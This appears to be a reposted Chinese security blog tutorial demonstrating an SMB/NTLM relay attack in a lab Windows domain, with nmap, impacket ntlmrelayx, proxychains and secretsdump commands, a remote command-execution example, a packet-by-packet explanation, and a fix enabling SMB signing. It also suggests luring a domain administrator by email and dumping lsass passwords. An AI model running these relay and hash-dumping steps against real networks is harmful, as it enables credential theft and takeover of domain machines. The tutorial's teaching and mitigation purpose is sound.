Windows SMB请求重放攻击分析

smb中继或叫smb请求重放攻击,B是一个smb服务器,A来进行认证,B将A的认证信息转发到C上,如果A的凭证在C上认证成功就能进行下一步操作,如创建服务执行命令。如果在域中控制了某些常用服务,如:WEB OA系统、文件共享等服务则可以尝试使用SMB中继攻击来引诱域管理员访问达到获取其他机器权限的目的。

30.png环境

192.168.123.10 win 7  域管理员(administrator)机器

192.168.123.11 kali linux 攻击者机器

192.168.123.100 域内普通用户-受害者机器

攻击演示

需要smb签名关闭下才能进行利用,只有windows server的smb签名是默认开启的,像Windows 7的签名默认关闭

可以用nmap探测smb是否关闭

nmap --script smb-security-mode.nse -p445 192.168.123.0/24 --open

1.png下载impacket工具包

git clone https://github.com/CoreSecurity/impacket.git

192.168.123.11(攻击者机器) 执行

ntlmrelayx.py -tf hosts.txt -socks -smb2support

hosts.txt里面的内容是要进行中继的IP,机器越多成功率越高,我这里只有一个IP

2.png

然后让192.168.123.10(域管理员机器) 访问192.168.123.11(攻击者机器)的共享,可以架设一个web服务器,html页面里嵌入\攻击者地址,我这里为了方便演示就在本地写一个html

3.png

192.168.123.10(域管理员机器)访问共享时,提示如下说明中继成功

4.png
[*] Authenticating against smb://192.168.123.100 as Z3R0Administrator SUCCEED
[*] SOCKS: Adding Z3R0/ADMINISTRATOR@192.168.123.100(445) to active SOCKS connection. Enjoy

然后在本地会创建一个socks4代理

在 /etc/proxychains.conf 的最后一行填入

socks4 	192.168.123.11 1080

配置好socks4代理后攻击者执行

proxychains python secretsdump.py z3r0/Administrator@192.168.123.100

这样secretsdump.py发送出的认证数据包经过socks4代理中继就能成功进行认证5.png

如果不加上其他参数的话ntlmrelayx.py默认会dumphash

6.png

先看看视频效果图

上传时 freebuf提示图片超出大小限制(希望小编能处理下:) ),效果图地址:http://ringk3y.com/wp-content/uploads/2018/06/1.gif

原理分析

每一步smb请求都被192.168.123.11(攻击者机器)转发到了其他机器上

7.png1. 192.168.123.10(域管理员机器)向192.168.123.11(攻击者机器)商量smb协议版本

8.png

2. 192.168.123.11(攻击者机器)向192.168.123.100(受害者机器)商量smb协议版本

3.192.168.123.100(受害者机器)向192.168.123.11(攻击者机器)回答支持smb v2

9.png4.192.168.123.11(攻击者机器)向192.168.123.10(域管理员机器)回答支持smb v2

协商完就开始认证了

10.png1.192.168.123.10(域管理员机器)向192.168.123.11(攻击者机器)发出NTLMSSP_NEGOTIATE认证协商请求

2.192.168.123.11(攻击者机器)向192.168.123.100(受害者机器)发出NTLMSSP_NEGOTIATE认证协商请求

3.192.168.123.100(受害者机器)向192.168.123.11(攻击者机器)进行响应,响应包里含有challenge

11.png4.同样192.168.123.11(攻击者机器)向192.168.123.10(域管理员机器)进行响应,响应包里含有challenge

5.192.168.123.10(域管理员机器)收到challenge后用hash将challenge加密,作为NTLM Response字段发送给192.168.123.11(攻击者机器)

12.png6.同样,192.168.123.11(攻击者机器)将域管理员的认证请求也发往192.168.123.100(受害者机器)

13.png在响应包中可以看到已经认证成功了

14.png有了管理员权限就能为所欲为了

16.png因为没有目标机器密码所以不能进行正常的smb认证,ntlmrelayx脚本的socks4代理作用就是处理本地发往192.168.123.100 (受害者机器)流量起一个中继作用,因为已经认证过了就不用再进行认证,密码随便填一个就行,使用socks4代理时的smb的身份认证是域管理员。

可以通过创建服务来执行命令,当然ntlmrelayx.py也可以做到.

python ntlmrelayx.py -tf hosts.txt -c 'cmexe /c calc.exe'

18.png当192.168.123.10(域管理员机器)再次访问共享时,192.168.123.100(受害者机器)上可以看到calc已经运行了

17.png

总结

1.可以通过给域管理员发送邮件的方式来让他触发smb请求

2.当然如果域管理员触发了smb中继请求了也可以针对他所在那一台机器做中继,这样就能执行命令抓lsass.exe进程中的明文密码了

修复建议

将注册表项”RequireSecuritySignature”设置为 1 可以启用 SMB 签名

powershell执行

Set-ItemProperty -Path "HKLM:SYSTEMCurrentControlSetServicesLanmanWorkstationParameters" RequireSecureNegotiate -Value 1 –Force

文章来源:https://www.cnaaa.net,转载请注明出处:https://www.cnaaa.net/archives/7493

(0)
郭靖的头像郭靖
上一篇 2023年3月3日 下午4:26
下一篇 2023年3月8日 下午4:49

相关推荐

  • 此站点的连接不安全,使用不受支持的协议。ERR_SSL_VERSION_OR_CIPHER_MISMATCH(不支持的协议 客户端和服务器不支持常用的 SSL 协议版本或密码套件。)

    如图所示报错 一、解决方法一1.Microsoft Edge浏览器→点击右上角的三个点→选择设置 2.选择外观→打开Internet Explorer 模式(IE 模式)按钮 3.打开Microsoft Edge浏览器→输入自己要访问的IP地址或者是链接→回车访问→点击右上角的IE图标(在 Internet Explorer 模式下的重新加载选项卡) 4.访…

    2023年7月25日
    4.1K00
  • 使用Powershell管理Windows计划任务

    在Windows系统中,我们经常使用Schedule Task来配置计划任务,来完成需要一段时间内重复完成的操作。Windows Schedule Task与Linux的Cron任务管理系统极为相似,都用于管理定时任务,但是前者大多数人都是以图形化操作为主,Powershell的出现将会改变这种情况。使用Powershell管理Schedule Task会事…

    2023年9月26日
    2.1K00
  • Win10如何关闭自动锁屏密码-Win10关闭自动锁屏密码方法

    自动锁屏密码通常是为了保护用户的隐私和数据安全。然而,在某些情况下,如在家中或者个人办公室使用电脑时,用户可能希望关闭自动锁屏密码功能,以便更快速地访问电脑,那么下面小编就给大家详细介绍一下Win10关闭自动锁屏密码方法吧。   Win10关闭自动锁屏密码方法 台式机   第一种方法是通过“设置”来关闭自动锁屏密码。   首先,点击屏幕左下角的Windows…

    2024年6月6日
    2.0K00
  • 通过远程桌面连接Windows实例提示“远程桌面用户组没有该权限”错误怎么办?

    本文介绍通过远程桌面连接Windows实例提示“远程桌面用户组没有该权限”错误的解决方案。 问题描述 本地客户端通过远程桌面连接Windows实例时提示“远程桌面用户组没有该权限”错误 解决方案 根据实际情况,选择对应方案进行解决。本文以Windows Server 2012操作系统为例。 方案一:修改本地安全策略。 右键单击开始,然后单击运行。在运行对话框…

    2023年3月2日
    1.8K00
  • GPG入门教程

    一、什么是GPG GPG有许多用途,本文主要介绍文件加密。至于邮件的加密,不同的邮件客户端有不同的设置,请参考Ubuntu网站的介绍。 本文的使用环境为Linux命令行。 二、安装 GPG有两种安装方式。可以下载源码,自己编译安装。   ./configure  make  make install 也可以安装编译好的二进制包。   # Debian / U…

    2023年6月15日
    1.7K00

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

在线咨询: QQ交谈

邮件:712342017@qq.com

工作时间:周一至周五,8:30-17:30,节假日休息

关注微信